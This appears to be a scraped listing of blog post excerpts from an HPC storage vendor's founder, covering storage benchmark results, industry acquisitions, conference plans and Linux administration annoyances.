Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Category: hardware
Posts
With every update, MacOSX becomes harder to build for
Way back in the good old 90s, we had very different versions of various unix systems. SunOS/Solaris, Irix, AIX, HP/UX, this upstart Linux, and some BSD things floating about. Of course, windows NT and others were starting to peek out then, and they had a “POSIX subsystem”.
Cross platform builds were generally speaking, a nightmare. While POSIX is a spec, writing to it didn’t guarantee that your application would work on a range of machines and OSes.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Working on benchmarking ML frameworks
Nice machine we have here …
root@hermes:/data/tests# lspci | egrep -i '(AMD|NVidia)' | grep VGA 3b:00.0 VGA compatible controller: <a href="http://www.pny.com/nvidia-quadro-gp100">NVIDIA Corporation GP100GL</a> (rev a1) 88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] <a href="http://www.tomshardware.com/reviews/amd-radeon-vega-frontier-edition-16gb,5128.html">Vega 10 XTX</a> [Radeon Vega Frontier Edition] I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:
root@hermes:/data/tests# lscpu | grep "Model name" Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
Another fun bit of debugging
Ok … so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box
Color me impressed … Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -> 6 x 104 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up
See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
* 24GB/s bandwidth largely insensitive to block size. * 5+ Million IOPs random IO (5+MIOPs) sensitive to block size. * 4k random read (100%) were well north of 5M IOPs.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “lets just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there, whom think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
love/hate relationship with new hardware
One of the dangers of dealing with newer hardware is often that, it doesn’t work so well. Or the drivers get hosed in mysterious ways. We’ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer design cards. Younger silicon, younger design. Newer kernel module. I can’t say I am enjoying this experience thus far.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Finally, a desktop Linux that just works
I’ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I’ve had laptops with Windows flavors (95, XP, 2000, 7), a MacOSX desktop. Before that, my first laptop I had bought (while working on my thesis) was a triple boot job, with DOS, Windows 9x, and OS2. I used the latter for when I was traveling and needed to write; the thesis was written in LaTeX and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, using Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, have always been fairly high, in the multiple 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently, 0.5ms for the last 2 years.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based) , and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. Whats coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. Its the applet the needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though its useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio ... Run status group 0 (all jobs): READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
Posts
Updated DeltaV4 quick benchies
Streaming reads and writes. Far beyond memory/cache/… all spinning disk. Remember, this is our “slow” storage.
[root@dv4-1 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data Run status group 0 (all jobs): WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec Run status group 0 (all jobs): READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
the mystery of the week
Customer has had a machine for a while. Generally stable. Followed our advice on doing a reboot recently. Unit started crashing Monday. Then today. Hard to stay up and stable. I asked if anything has changed, and haven’t gotten anything conclusive … mostly “we don’t think so”. About the crashes: Nothing in the logs. Not a thing. No hardware subsystem, which has logging enabled (RAID, motherboard, PCIe, IPMI, … ) reports an error.
Posts
2 out of 3 ain't bad
No, not Meatloaf lyrics. A few years ago, I guessed that the HPC market was going to bifurcate or possibly trifurcate. Well, its about 3 years on, and bifurcate it did. Accelerators (in the form of GPUs) are everywhere. I was dead on correct in almost every aspect of what I had predicted (privately to VCs, from whom we couldn’t raise a cent in the early/mid 2000’s for this market). Remote cluster/clouds with dropping prices per CPU hour are taking over sections of HPC, and we see some impact upon purchase decisions made by people buying clusters.
Posts
Is this really a good idea?
ikoniLooks like HP is looking at ditching its PCs. First off, they are definitely killing off WebOS and the whole Palm business. Ok … WebOS looked interesting. Now having an Android, and an iPhone (about to be retired, which the Android is replacing), I find it hard to put down the iPhone and get excited about Android. I have a sense of … a less polished integration. Some things don’t work very well in Android.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
What is going on with SGI?
We are hearing about SGI wins on HPCwire and other venues. These should be good, and reflective in the stock price.
[ ](http://ichart.finance.yahoo.com/z?s=SGIC&t=2y&q=l&l=on&z=l&p=s&a=v&p=s)
But they aren’t. SGI’s market cap is 90.6M as of this morning, with 1500+ employees. Trailing 12 month revenue is 415M. They have 85M of debt. About 33.2M in cash. Something has got to give here. As they stopped making their own stuff, COGS increased, as their suppliers made more margin off completed product.
Posts
Tilera
Over at Accelerated Times, an article was posted about the Tilera. Now I haven’t heard much about Tilera, other than pre-releases. [update: look at the comment here] The author focuses on several important aspects. The business model, the money raise, are they are where they say they are.
What strikes me is that if they raised a B-round, this usually … usually happens post initial revenue, when you start to see interest and traction.
Posts
